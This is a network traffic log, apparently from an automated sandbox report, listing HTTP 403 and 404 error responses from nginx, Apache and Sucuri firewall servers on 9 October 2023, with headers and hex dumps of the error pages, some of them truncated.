                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:54 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: HXR2QYc2XBOIxYXpEjCVHw==,m0j2EEknGIVUW/liY8BLLuuWLGLAwvTMYA8ArAuxUdgm++C2XkuTvnlRFg2XiSDLX-Wix-Request-Id: 1696859454.2813167266733124426X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:54 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=4, max=350Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 09 Oct 2023 13:50:54 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:54 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:50:54 GMTContent-Type: text/htmlContent-Length: 75193Connection: keep-aliveVary: Accept-EncodingETag: "65142bc3-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:50:21 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:54 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:54 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:21:02 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:54 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 09 Oct 2023 13:50:55 GMTcontent-type: text/html; charset=iso-8859-1content-length: 199server: Apachex-iplb-request-id: 66819144:C35B_D5BA2110:0050_6524053F_7FC5:43E5x-iplb-instance: 28102Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:55 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Mon, 09 Oct 2023 13:50:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 11003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:50:55 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
